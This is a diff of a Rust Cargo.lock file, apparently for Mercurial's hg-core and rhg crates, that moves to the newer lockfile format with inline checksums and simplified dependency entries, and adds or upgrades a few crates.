- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "winapi",
]
[[package]]
name = "memoffset"
version = "0.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
]
[[package]]
name = "micro-timer"
version = "0.3.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c"
dependencies = [
- "micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "micro-timer-macros",
+ "scopeguard",
]
[[package]]
name = "micro-timer-macros"
version = "0.3.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d"
dependencies = [
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro2",
+ "quote",
+ "scopeguard",
+ "syn",
]
[[package]]
name = "miniz_oxide"
version = "0.4.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d"
dependencies = [
- "adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "adler",
+ "autocfg",
+]
+
+[[package]]
+name = "num-integer"
+version = "0.1.44"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db"
+dependencies = [
+ "autocfg",
+ "num-traits",
]
[[package]]
name = "num-traits"
version = "0.2.14"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
]
[[package]]
name = "num_cpus"
version = "1.13.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3"
dependencies = [
- "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "hermit-abi",
+ "libc",
]
[[package]]
name = "output_vt100"
version = "0.1.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
+]
+
+[[package]]
+name = "paste"
+version = "0.1.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "45ca20c77d80be666aef2b45486da86238fabe33e38306bd3118fe4af33fa880"
+dependencies = [
+ "paste-impl",
+ "proc-macro-hack",
+]
+
+[[package]]
+name = "paste-impl"
+version = "0.1.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d95a7db200b97ef370c8e6de0088252f7e0dfff7d047a28528e47456c0fc98b6"
+dependencies = [
+ "proc-macro-hack",
]
[[package]]
name = "pkg-config"
version = "0.3.19"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c"
[[package]]
name = "ppv-lite86"
version = "0.2.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857"
[[package]]
name = "pretty_assertions"
version = "0.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427"
dependencies = [
- "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)",
- "difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "ansi_term",
+ "ctor",
+ "difference",
+ "output_vt100",
]
[[package]]
name = "proc-macro-hack"
version = "0.5.19"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5"
[[package]]
name = "proc-macro2"
version = "1.0.24"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71"
dependencies = [
- "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "unicode-xid",
]
[[package]]
name = "python27-sys"
-version = "0.4.1"
+version = "0.5.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f485897ed7048f5032317c4e427800ef9f2053355516524d73952b8b07032054"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "regex",
]
[[package]]
name = "python3-sys"
-version = "0.4.1"
+version = "0.5.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5b29b99c6868eb02beb3bf6ed025c8bcdf02efc149b8e80347d3e5d059a806db"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "regex",
]
[[package]]
name = "quick-error"
version = "1.2.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0"
[[package]]
name = "quote"
version = "1.0.7"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37"
dependencies = [
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro2",
]
[[package]]
name = "rand"
version = "0.3.23"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "rand 0.4.6",
]
[[package]]
name = "rand"
version = "0.4.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293"
dependencies = [
- "fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "fuchsia-cprng",
+ "libc",
+ "rand_core 0.3.1",
+ "rdrand",
+ "winapi",
]
[[package]]
name = "rand"
version = "0.7.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03"
dependencies = [
- "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "getrandom",
+ "libc",
+ "rand_chacha",
+ "rand_core 0.5.1",
+ "rand_hc",
]
[[package]]
name = "rand_chacha"
version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402"
dependencies = [
- "ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "ppv-lite86",
+ "rand_core 0.5.1",
]
[[package]]
name = "rand_core"
version = "0.3.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b"
dependencies = [
- "rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.4.2",
]
[[package]]
name = "rand_core"
version = "0.4.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc"
[[package]]
name = "rand_core"
version = "0.5.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19"
dependencies = [
- "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)",
+ "getrandom",
]
[[package]]
name = "rand_distr"
version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2"
dependencies = [
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand 0.7.3",
]
[[package]]
name = "rand_hc"
version = "0.2.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c"
dependencies = [
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.5.1",
]
[[package]]
name = "rand_pcg"
version = "0.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429"
dependencies = [
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.5.1",
]
[[package]]
name = "rand_xoshiro"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004"
dependencies = [
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.5.1",
]
[[package]]
name = "rayon"
version = "1.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
+ "crossbeam-deque",
+ "either",
+ "rayon-core",
]
[[package]]
name = "rayon-core"
version = "1.9.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a"
dependencies = [
- "crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "crossbeam-channel 0.5.0",
+ "crossbeam-deque",
+ "crossbeam-utils 0.8.1",
+ "lazy_static",
+ "num_cpus",
]
[[package]]
name = "rdrand"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2"
dependencies = [
- "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "rand_core 0.3.1",
]
[[package]]
name = "redox_syscall"
version = "0.1.57"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce"
[[package]]
name = "regex"
version = "1.4.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c"
dependencies = [
- "aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)",
- "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)",
- "thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "aho-corasick",
+ "memchr",
+ "regex-syntax",
+ "thread_local",
]
[[package]]
name = "regex-syntax"
version = "0.6.21"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189"
[[package]]
name = "remove_dir_all"
version = "0.5.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
]
[[package]]
name = "rhg"
version = "0.1.0"
dependencies = [
- "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "hg-core 0.1.0",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
- "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "chrono",
+ "clap",
+ "derive_more",
+ "env_logger",
+ "format-bytes",
+ "hg-core",
+ "lazy_static",
+ "log",
+ "micro-timer",
+ "regex",
+ "users",
]
[[package]]
name = "rust-crypto"
version = "0.2.36"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a"
dependencies = [
- "gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)",
- "rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)",
+ "gcc",
+ "libc",
+ "rand 0.3.23",
+ "rustc-serialize",
+ "time",
]
[[package]]
name = "rustc-serialize"
version = "0.3.24"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda"
[[package]]
name = "same-file"
version = "1.0.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502"
dependencies = [
- "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi-util",
]
[[package]]
name = "scopeguard"
version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
[[package]]
name = "sized-chunks"
version = "0.6.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f"
dependencies = [
- "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "bitmaps",
+ "typenum",
]
[[package]]
name = "static_assertions"
version = "1.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f"
[[package]]
name = "strsim"
version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a"
[[package]]
name = "syn"
version = "1.0.54"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44"
dependencies = [
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro2",
+ "quote",
+ "unicode-xid",
]
[[package]]
name = "tempfile"
version = "3.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)",
- "remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
+ "libc",
+ "rand 0.7.3",
+ "redox_syscall",
+ "remove_dir_all",
+ "winapi",
]
[[package]]
name = "termcolor"
version = "1.1.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4"
dependencies = [
- "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi-util",
]
[[package]]
name = "textwrap"
version = "0.11.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060"
dependencies = [
- "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)",
+ "unicode-width",
]
[[package]]
name = "thread_local"
version = "1.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14"
dependencies = [
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "lazy_static",
]
[[package]]
name = "time"
version = "0.1.44"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "wasi 0.10.0+wasi-snapshot-preview1",
+ "winapi",
]
[[package]]
name = "twox-hash"
version = "1.6.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
+ "rand 0.7.3",
+ "static_assertions",
]
[[package]]
name = "typenum"
version = "1.12.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33"
[[package]]
name = "unicode-width"
version = "0.1.8"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3"
[[package]]
name = "unicode-xid"
version = "0.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564"
+
+[[package]]
+name = "users"
+version = "0.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032"
+dependencies = [
+ "libc",
+ "log",
+]
[[package]]
name = "vcpkg"
version = "0.2.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb"
[[package]]
name = "vec_map"
version = "0.8.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191"
[[package]]
name = "version_check"
version = "0.9.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed"
[[package]]
name = "wasi"
version = "0.9.0+wasi-snapshot-preview1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
[[package]]
name = "wasi"
version = "0.10.0+wasi-snapshot-preview1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f"
[[package]]
name = "winapi"
version = "0.3.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
dependencies = [
- "winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi-i686-pc-windows-gnu",
+ "winapi-x86_64-pc-windows-gnu",
]
[[package]]
name = "winapi-i686-pc-windows-gnu"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
[[package]]
name = "winapi-util"
version = "0.1.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
]
[[package]]
name = "winapi-x86_64-pc-windows-gnu"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
[[package]]
name = "zstd"
version = "0.5.3+zstd.1.4.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8"
dependencies = [
- "zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "zstd-safe",
]
[[package]]
name = "zstd-safe"
version = "2.0.5+zstd.1.4.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "zstd-sys",
]
[[package]]
name = "zstd-sys"
version = "1.4.17+zstd.1.4.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b"
dependencies = [
- "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)",
- "glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cc",
+ "glob",
+ "itertools",
+ "libc",
]
-
-[metadata]
-"checksum adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e"
-"checksum aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)" = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5"
-"checksum ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b"
-"checksum atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8"
-"checksum autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a"
-"checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693"
-"checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2"
-"checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de"
-"checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48"
-"checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
-"checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
-"checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002"
-"checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826"
-"checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95"
-"checksum crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a"
-"checksum crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87"
-"checksum crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775"
-"checksum crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9"
-"checksum crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d"
-"checksum crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8"
-"checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d"
-"checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484"
-"checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198"
-"checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
-"checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36"
-"checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129"
-"checksum format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)" = "1a7374eb574cd29ae45878554298091c554c3286a17b3afa440a3e2710ae0790"
-"checksum format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "4edcc04201cea17a0e6b937adebd46b93fba09924c7e6ed8c515a35ce8432cbc"
-"checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba"
